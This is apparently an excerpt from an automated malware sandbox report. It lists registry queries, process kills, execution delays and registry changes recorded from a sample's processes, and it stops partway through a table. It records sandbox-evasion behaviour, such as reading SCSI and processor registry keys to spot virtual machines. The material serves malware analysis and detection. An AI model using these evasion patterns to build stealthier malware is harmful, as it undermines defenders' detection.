7204	6908	WerFault.exe	qkthdrfkkoe.exe
7424	6908	WerFault.exe	qkthdrfkkoe.exe
512	6908	WerFault.exe	qkthdrfkkoe.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

svchost.exetapinstall.exeDrvInst.exeDrvInst.exetapinstall.exesvchost.exetoolspab1.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	DrvInst.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exewinxsl.exewwfvd.exewwfvd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winxsl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winxsl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wwfvd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wwfvd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wwfvd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wwfvd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

4316 timeout.exe
1120 timeout.exe
7700 timeout.exe

pid	process
4316	timeout.exe
1120	timeout.exe
7700	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

6696 taskkill.exe
7032 taskkill.exe
4140 taskkill.exe
7928 taskkill.exe

pid	process
6696	taskkill.exe
7032	taskkill.exe
4140	taskkill.exe
7928	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

Processes:

browser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exebrowser_broker.exeMicrosoftEdge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

DrvInst.exeapp.exemask_svc.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time"	mask_svc.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exerundll32.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMsiExec.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
